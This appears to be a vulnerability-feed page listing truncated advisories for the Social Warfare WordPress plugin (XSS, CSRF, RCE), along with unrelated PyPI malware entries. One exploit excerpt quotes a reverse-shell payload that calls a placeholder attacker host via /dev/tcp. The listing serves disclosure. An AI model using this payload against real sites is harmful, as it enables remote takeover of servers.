CVE-2023-4842

The Social Sharing Plugin - Social Warfare plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'socialwarfare' shortcode in versions up to, and including, 4.4.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for...

CVE-2024-34825

Cross-Site Request Forgery CSRF vulnerability in Warfare Plugins Social Warfare.This issue affects Social Warfare: from n/a through 4.4.5.1...

Exploit for Cross-site Scripting in Warfareplugins Social_Warfare

CVE-2019-9978-RCE-PoC A custom Pytho...

EUVD-2023-12461

Malicious code in bioql PyPI...

EUVD-2021-34261

Malicious code in bioql PyPI...

EUVD-2023-12462

Malicious code in bioql PyPI...

EUVD-2024-17677

Malicious code in bioql PyPI...

📄 WordPress Social Welfare 3.5.2 Remote Code Execution

WordPress Social Welfare plugin versions 3.5.2 and below suffer from a remote code execution vulnerability. !/usr/bin/env python3 Exploit Title: Social Warfare WordPress Plugin 3.5.2 - Remote Code Execution RCE Date: 25-06-2025 Exploit Author: Huseyin Mardini @housma Original Researcher: Luka Sik...

📄 WordPress Social Warfare 3.5.2 Remote Code Execution

Proof of concept remote code execution exploit for WordPress Social Warfare plugin versions 3.5.2 and below. !/usr/bin/env python3 Exploit Title: CVE-2019-9978: Remote Code Execution in Social Warfare WordPress Plugin system"bash -c \"bash -i & /dev/tcp/ATTACKERIP/LISTENPORT 0&1\""' with...

CVE-2019-9978

The social-warfare plugin before 3.5.3 for WordPress has stored XSS via the wp-admin/admin-post.php?swpdebug=loadoptions swpurl parameter, as exploited in the wild in March 2019. This affects Social Warfare and Social Warfare Pro...

CVE-2025-26973 WordPress Social Warfare Plugin <= 4.5.5 - Cross Site Scripting (XSS) vulnerability

Improper Neutralization of Input During Web Page Generation 'Cross-site Scripting' vulnerability in WarfarePlugins Social Warfare social-warfare allows DOM-Based XSS.This issue affects Social Warfare: from n/a through = 4.5.5...

WordPress Social Warfare Plugin <= 4.5.5 - Cross Site Scripting (XSS) vulnerability

Cross Site Scripting XSS vulnerability discovered by zaim Patchstack Alliance in WordPress Plugin Social Warfare versions = 4.5.5...

CVE-2021-4434

The Social Warfare plugin for WordPress is vulnerable to Remote Code Execution in versions up to, and including, 3.5.2 via the 'swpurl' parameter. This allows attackers to execute code on the server...

WordPress Social Warfare Plugin <= 4.4.5.1 is vulnerable to Cross Site Request Forgery (CSRF)

Software Social Warfare Type Plugin Vulnerable versions = 4.4.5.1 Fixed in 4.4.6 OWASP Top 10 A4: Insecure Design Classification Cross Site Request Forgery CSRF CVE CVE-2024-34825 Patch priority Low CVSS severity Low 4.3 Developer Claim ownership PSID b83b2493f1f5 Credits Majed Refaea Required...

CVE-2024-1959

The Social Sharing Plugin – Social Warfare plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'socialWarfare' shortcode in all versions up to, and including, 4.4.6.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes ...

WordPress Social Sharing Plugin – Social Warfare plugin <= 4.4.6.1 - Authenticated(Contributor+) Stored Cross-Site Scripting via Shortcode vulnerability

AuthenticatedContributor+ Stored Cross-Site Scripting via Shortcode vulnerability discovered by Krzysztof Zając in WordPress Plugin Social Warfare versions = 4.4.6.1...

CVE-2021-4434

The Social Warfare plugin for WordPress is vulnerable to Remote Code Execution in versions up to, and including, 3.5.2 via the 'swpurl' parameter. This allows attackers to execute code on the server...

CVE-2021-4434

CVE-2021-4434 affects the WordPress Social Warfare plugin (versions up to 3.5.2). The vulnerability is a Remote Code Execution via the swp_url parameter, allowing an attacker to execute code on the server. Root cause: improper handling of the swp_url input. Impact: high (remote code execution). A...

CVE-2023-4842

The Social Sharing Plugin - Social Warfare plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'socialwarfare' shortcode in versions up to, and including, 4.4.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for...

PT-2023-30839 · WordPress · Social Warfare

Name of the Vulnerable Software and Affected Versions: The Social Sharing Plugin - Social Warfare plugin for WordPress versions up to, and including, 4.4.3 Description: The issue arises from insufficient input sanitization and output escaping on user-supplied attributes in the 'social warfare'...